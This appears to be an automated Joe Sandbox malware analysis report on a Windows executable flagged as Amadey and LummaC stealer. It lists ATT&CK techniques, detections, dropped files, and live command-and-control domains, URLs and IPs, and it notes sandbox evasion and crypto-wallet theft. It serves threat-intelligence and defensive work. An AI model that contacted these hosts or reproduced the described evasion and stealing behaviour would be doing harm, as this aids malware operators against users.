                Email AddressesDNS ServerDomain Accounts2
                Command and Scripting Interpreter
                Logon Script (Windows)2
                Valid Accounts
                3
                Obfuscated Files or Information
                Security Account Manager13
                File and Directory Discovery
                SMB/Windows Admin Shares21
                Input Capture
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts1
                PowerShell
                Login Hook21
                Access Token Manipulation
                12
                Software Packing
                NTDS239
                System Information Discovery
                Distributed Component Object Model3
                Clipboard Data
                115
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
                Process Injection
                1
                DLL Side-Loading
                LSA Secrets1
                Query Registry
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                Masquerading
                Cached Domain Credentials1171
                Security Software Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Valid Accounts
                DCSync561
                Virtualization/Sandbox Evasion
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job561
                Virtualization/Sandbox Evasion
                Proc Filesystem14
                Process Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                Access Token Manipulation
                /etc/passwd and /etc/shadow11
                Application Window Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
                Process Injection
                Network Sniffing1
                System Owner/User Discovery
                Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                Remote System Discovery
                Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1581619 Sample: TNyOrM6mIM.exe Startdate: 28/12/2024 Architecture: WINDOWS Score: 100 39 yYkNteoVRFthbcESpvExVn.yYkNteoVRFthbcESpvExVn 2->39 41 spuriotis.click 2->41 51 Suricata IDS alerts for network traffic 2->51 53 Found malware configuration 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 12 other signatures 2->57 9 TNyOrM6mIM.exe 3 2->9         started        signatures3 process4 file5 35 C:\Users\user\AppData\Local\Temp\Set-up.exe, PE32 9->35 dropped 37 C:\Users\user\AppData\...\PasoCattle.exe, PE32 9->37 dropped 69 Detected unpacking (changes PE section rights) 9->69 71 Tries to detect sandboxes and other dynamic analysis tools (window names) 9->71 73 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 9->73 75 5 other signatures 9->75 13 PasoCattle.exe 19 9->13         started        15 Set-up.exe 9->15         started        signatures6 process7 dnsIp8 19 cmd.exe 2 13->19         started        45 home.fortth14ht.top 194.87.58.92, 49714, 49717, 49720 RELCOM-ASRelcomGroup19022019RU Russian Federation 15->45 47 httpbin.org 3.218.7.103, 443, 49711 AMAZON-AESUS United States 15->47 49 Multi AV Scanner detection for dropped file 15->49 signatures9 process10 file11 33 C:\Users\user\AppData\Local\...\Climb.com, PE32 19->33 dropped 59 Drops PE files with a suspicious file extension 19->59 23 Climb.com 19->23         started        27 cmd.exe 2 19->27         started        29 extrac32.exe 17 19->29         started        31 8 other processes 19->31 signatures12 process13 dnsIp14 43 spuriotis.click 104.21.2.51, 443, 49718, 49721 CLOUDFLARENETUS United States 23->43 61 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 23->61 63 Query firmware table information (likely to detect VMs) 23->63 65 Found many strings related to Crypto-Wallets (likely being stolen) 23->65 67 5 other signatures 23->67 signatures15

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                TNyOrM6mIM.exe66%ReversingLabsWin32.Trojan.Amadey
                TNyOrM6mIM.exe100%AviraHEUR/AGEN.1313526
                TNyOrM6mIM.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\768400\Climb.com0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\PasoCattle.exe11%ReversingLabs
                C:\Users\user\AppData\Local\Temp\Set-up.exe70%ReversingLabsWin32.Trojan.Amadey
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0798100%Avira URL Cloudmalware
                https://spuriotis.click/.0%Avira URL Cloudsafe
                https://spuriotis.click/&0%Avira URL Cloudsafe
                https://spuriotis.click/es&0%Avira URL Cloudsafe
                https://spuriotis.click/0%Avira URL Cloudsafe
                https://spuriotis.click/apis0%Avira URL Cloudsafe
                https://spuriotis.click/apik0%Avira URL Cloudsafe
                https://spuriotis.click:443/api0%Avira URL Cloudsafe
                http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003lse100%Avira URL Cloudmalware
                https://spuriotis.click/er0%Avira URL Cloudsafe
                https://spuriotis.click/api0%Avira URL Cloudsafe
                spuriotis.click0%Avira URL Cloudsafe
                http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003ff::3100%Avira URL Cloudmalware
                https://spuriotis.click:443/apiion.txtPK0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                spuriotis.click
                104.21.2.51
                truefalse
                  high
                  home.fortth14ht.top
                  194.87.58.92
                  truefalse
                    high
                    httpbin.org
                    3.218.7.103
                    truefalse
                      high
                      yYkNteoVRFthbcESpvExVn.yYkNteoVRFthbcESpvExVn
                      unknown
                      unknownfalse
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        scentniej.buzzfalse
                          high
                          http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0false
                            high
                            http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003false
                              high
                              hummskitnj.buzzfalse
                                high
                                rebuildeso.buzzfalse
                                  high
                                  appliacnesot.buzzfalse
                                    high
                                    screwamusresz.buzzfalse
                                      high
                                      cashfuzysao.buzzfalse
                                        high
                                        inherineau.buzzfalse
                                          high
                                          https://spuriotis.click/apitrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://httpbin.org/ipfalse
                                            high
                                            prisonyfork.buzzfalse
                                              high
                                              spuriotis.clicktrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              NameSourceMaliciousAntivirus DetectionReputation
                                              http://html4/loose.dtdTNyOrM6mIM.exe, 00000000.00000003.2345421831.0000000007944000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.2355150183.0000000000ADB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drfalse
                                                high
                                                https://duckduckgo.com/chrome_newtabClimb.com, 0000000E.00000003.2620130530.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620035354.0000000003B4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://duckduckgo.com/ac/?q=Climb.com, 0000000E.00000003.2620130530.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620035354.0000000003B4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696506299400400001.1&ci=1696506299033.12791&ctaClimb.com, 0000000E.00000003.2691105884.0000000003A08000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://ocsp.sectigo.com0TNyOrM6mIM.exe, 00000000.00000002.2388287477.0000000006BC5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.drfalse
                                                        high
                                                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_cd61a4703a8613be887576f2bd084bcc6f4756dccdbe5062Climb.com, 0000000E.00000003.2691105884.0000000003A08000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003http://home.fortth14ht.top/nTrmoVgOaovBJpKSSet-up.exe, 00000003.00000002.2606819261.0000000000AD9000.00000004.00000001.01000000.00000008.sdmpfalse
                                                            high
                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Climb.com, 0000000E.00000003.2620130530.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620497873.0000000003A38000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620035354.0000000003B4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://.cssTNyOrM6mIM.exe, 00000000.00000003.2345421831.0000000007944000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.2355150183.0000000000ADB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drfalse
                                                                high
                                                                https://www.autoitscript.com/autoit3/Climb.com, 0000000E.00000003.2569924765.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.drfalse
                                                                  high
                                                                  http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0798Set-up.exe, 00000003.00000003.2603485994.0000000001717000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2604040691.0000000001717000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2604781762.0000000001717000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2606099078.0000000001717000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2607765852.0000000001717000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  https://curl.se/docs/hsts.htmlSet-up.exe.0.drfalse
                                                                    high
                                                                    https://spuriotis.click/.Climb.com, 0000000E.00000002.3576922745.0000000003A89000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://x1.c.lencr.org/0Climb.com, 0000000E.00000003.2665244982.00000000013FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://x1.i.lencr.org/0Climb.com, 0000000E.00000003.2665244982.00000000013FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchClimb.com, 0000000E.00000003.2620130530.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620497873.0000000003A38000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620035354.0000000003B4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://spuriotis.click/&Climb.com, 0000000E.00000002.3576219279.0000000001327000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://spuriotis.click/apikClimb.com, 0000000E.00000002.3576614656.0000000001365000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://support.mozilla.org/products/firefoxgro.allClimb.com, 0000000E.00000003.2666357847.00000000057DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://spuriotis.click/erClimb.com, 0000000E.00000002.3576922745.0000000003A89000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://.jpgTNyOrM6mIM.exe, 00000000.00000003.2345421831.0000000007944000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.2355150183.0000000000ADB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drfalse
                                                                              high
                                                                              https://spuriotis.click/es&Climb.com, 0000000E.00000002.3576922745.0000000003A89000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003lseSet-up.exe, 00000003.00000003.2603485994.00000000016FC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2606099078.0000000001712000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2603940005.000000000170C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2604781762.000000000170E000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2603578861.0000000001709000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2607765852.0000000001713000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              https://spuriotis.click/Climb.com, 0000000E.00000002.3576922745.0000000003A89000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000002.3576219279.0000000001327000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://spuriotis.click/apisClimb.com, 0000000E.00000002.3576789181.0000000003A0F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696506299400400001.2&ci=1696506299033.Climb.com, 0000000E.00000003.2691105884.0000000003A08000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://sectigo.com/CPS0TNyOrM6mIM.exe, 00000000.00000002.2388287477.0000000006BC5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.drfalse
                                                                                  high
                                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoClimb.com, 0000000E.00000003.2620130530.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620035354.0000000003B4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://curl.se/docs/http-cookies.htmlTNyOrM6mIM.exe, 00000000.00000003.2345421831.0000000007944000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.2355150183.0000000000ADB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drfalse
                                                                                      high
                                                                                      http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP13Set-up.exe.0.drfalse
                                                                                        high
                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Climb.com, 0000000E.00000003.2620130530.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620035354.0000000003B4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://crl.rootca1.amazontrust.com/rootca1.crl0Climb.com, 0000000E.00000003.2665244982.00000000013FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.autoitscript.com/autoit3/XClimb.com, 0000000E.00000003.2569924765.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000000.2417281076.0000000000B35000.00000002.00000001.01000000.0000000A.sdmp, Climb.com.4.dr, Fingers.11.drfalse
                                                                                              high
                                                                                              http://ocsp.rootca1.amazontrust.com0:Climb.com, 0000000E.00000003.2665244982.00000000013FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://nsis.sf.net/NSIS_ErrorErrorTNyOrM6mIM.exe, 00000000.00000002.2388287477.0000000006BC5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe, 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmp, PasoCattle.exe, 00000002.00000000.2344750367.0000000000409000.00000002.00000001.01000000.00000007.sdmp, PasoCattle.exe.0.drfalse
                                                                                                  high
                                                                                                  https://curl.se/docs/alt-svc.htmlSet-up.exe.0.drfalse
                                                                                                    high
                                                                                                    https://www.ecosia.org/newtab/Climb.com, 0000000E.00000003.2620130530.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620497873.0000000003A38000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620035354.0000000003B4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://spuriotis.click:443/apiClimb.com, 0000000E.00000002.3576219279.0000000001327000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brClimb.com, 0000000E.00000003.2666357847.00000000057DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://ac.ecosia.org/autocomplete?q=Climb.com, 0000000E.00000003.2620130530.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620497873.0000000003A38000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620035354.0000000003B4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tTNyOrM6mIM.exe, 00000000.00000002.2388287477.0000000006BC5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.drfalse
                                                                                                            high
                                                                                                            https://httpbin.org/ipbeforeTNyOrM6mIM.exe, 00000000.00000003.2345421831.0000000007944000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.2355150183.0000000000ADB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drfalse
                                                                                                              high
                                                                                                              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgClimb.com, 0000000E.00000003.2691105884.0000000003A08000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003ff::3Set-up.exe, 00000003.00000003.2603485994.00000000016FC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2606099078.0000000001712000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2603940005.000000000170C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2604781762.000000000170E000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2603578861.0000000001709000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2607765852.0000000001713000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: malware
                                                                                                                unknown
                                                                                                                http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#TNyOrM6mIM.exe, 00000000.00000002.2388287477.0000000006BC5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.drfalse
                                                                                                                  high
                                                                                                                  https://spuriotis.click:443/apiion.txtPKClimb.com, 0000000E.00000002.3576219279.0000000001327000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  http://crt.rootca1.amazontrust.com/rootca1.cer0?Climb.com, 0000000E.00000003.2665244982.00000000013FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&uClimb.com, 0000000E.00000003.2691105884.0000000003A08000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4CbmfQq%2B4pbW4pbWfpbX7ReNxR3UIG8zInwYIFIVs9eClimb.com, 0000000E.00000003.2691105884.0000000003A08000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgClimb.com, 0000000E.00000003.2691105884.0000000003A08000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Climb.com, 0000000E.00000003.2620130530.0000000003A36000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620497873.0000000003A38000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620035354.0000000003B4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            • No. of IPs < 25%
                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                            • 75% < No. of IPs
                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                            104.21.2.51
                                                                                                                            spuriotis.clickUnited States
                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                            194.87.58.92
                                                                                                                            home.fortth14ht.topRussian Federation
                                                                                                                            2118RELCOM-ASRelcomGroup19022019RUfalse
                                                                                                                            3.218.7.103
                                                                                                                            httpbin.orgUnited States
                                                                                                                            14618AMAZON-AESUSfalse
                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                            Analysis ID:1581619
                                                                                                                            Start date and time:2024-12-28 09:55:36 +01:00
                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                            Overall analysis duration:0h 8m 19s
                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                            Report type:full
                                                                                                                            Cookbook file name:default.jbs
                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                            Number of analysed new started processes analysed:18
                                                                                                                            Number of new started drivers analysed:0
                                                                                                                            Number of existing processes analysed:0
                                                                                                                            Number of existing drivers analysed:0
                                                                                                                            Number of injected processes analysed:0
                                                                                                                            Technologies:
                                                                                                                            • HCA enabled
                                                                                                                            • EGA enabled
                                                                                                                            • AMSI enabled
                                                                                                                            Analysis Mode:default
                                                                                                                            Analysis stop reason:Timeout
                                                                                                                            Sample name:TNyOrM6mIM.exe
                                                                                                                            renamed because original name is a hash value
                                                                                                                            Original Sample Name:ec19fa1027fee164803cc127aef64199.exe
                                                                                                                            Detection:MAL
                                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@28/22@10/3
                                                                                                                            EGA Information:
                                                                                                                            • Successful, ratio: 50%
                                                                                                                            HCA Information:Failed
                                                                                                                            Cookbook Comments:
                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                            • Excluded IPs from analysis (whitelisted): 52.149.20.212
                                                                                                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                            • Execution Graph export aborted for target Set-up.exe, PID 6744 because there are no executed function
                                                                                                                            • Execution Graph export aborted for target TNyOrM6mIM.exe, PID 7112 because it is empty
                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                            • VT rate limit hit for: TNyOrM6mIM.exe
                                                                                                                            TimeTypeDescription
                                                                                                                            03:56:36API Interceptor1x Sleep call for process: PasoCattle.exe modified
                                                                                                                            03:56:43API Interceptor9x Sleep call for process: Climb.com modified
                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            104.21.2.51j2nLC29vCy.exeGet hashmaliciousLummaCBrowse
                                                                                                                              ZTM2pfyhu3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                194.87.58.92j2nLC29vCy.exeGet hashmaliciousLummaCBrowse
                                                                                                                                • home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
                                                                                                                                es5qBEFupj.exeGet hashmaliciousLummaCBrowse
                                                                                                                                • home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
                                                                                                                                vUcZzNWkKc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                • home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
                                                                                                                                CLaYpUL3zw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                • home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
                                                                                                                                3.218.7.103ZFttiy4Tt8.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  e62iSl0abZ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    A3nofpjN9A.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      j2nLC29vCy.exeGet hashmaliciousLummaCBrowse
                                                                                                                                        vUcZzNWkKc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          GjZewfxHTi.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            xdeRtWCeNH.exeGet hashmaliciousUnknownBrowse
                                                                                                                                              E205fJJS1Q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                w22319us3M.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                  QzK1LCSuq2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    httpbin.orgZFttiy4Tt8.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 3.218.7.103
                                                                                                                                                    e62iSl0abZ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 3.218.7.103
                                                                                                                                                    HGFSqmKwd5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 34.226.108.155
                                                                                                                                                    A3nofpjN9A.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 3.218.7.103
                                                                                                                                                    QMtCX5RLOP.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 34.226.108.155
                                                                                                                                                    j2nLC29vCy.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 3.218.7.103
                                                                                                                                                    es5qBEFupj.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 34.226.108.155
                                                                                                                                                    s8kPMNXOZY.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 34.226.108.155
                                                                                                                                                    vUcZzNWkKc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 3.218.7.103
                                                                                                                                                    GjZewfxHTi.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 3.218.7.103
                                                                                                                                                    spuriotis.clickj2nLC29vCy.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 104.21.2.51
                                                                                                                                                    es5qBEFupj.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 172.67.128.184
                                                                                                                                                    vUcZzNWkKc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 172.67.128.184
                                                                                                                                                    CLaYpUL3zw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 172.67.128.184
                                                                                                                                                    ZTM2pfyhu3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 104.21.2.51
                                                                                                                                                    home.fortth14ht.topj2nLC29vCy.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 194.87.58.92
                                                                                                                                                    es5qBEFupj.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 194.87.58.92
                                                                                                                                                    vUcZzNWkKc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 194.87.58.92
                                                                                                                                                    CLaYpUL3zw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 194.87.58.92
                                                                                                                                                    E205fJJS1Q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 185.121.15.192
                                                                                                                                                    QzK1LCSuq2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 185.121.15.192
                                                                                                                                                    OAKPYEH4c6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 185.121.15.192
                                                                                                                                                    ZTM2pfyhu3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 185.121.15.192
                                                                                                                                                    YrxiR3yCLm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 185.121.15.192
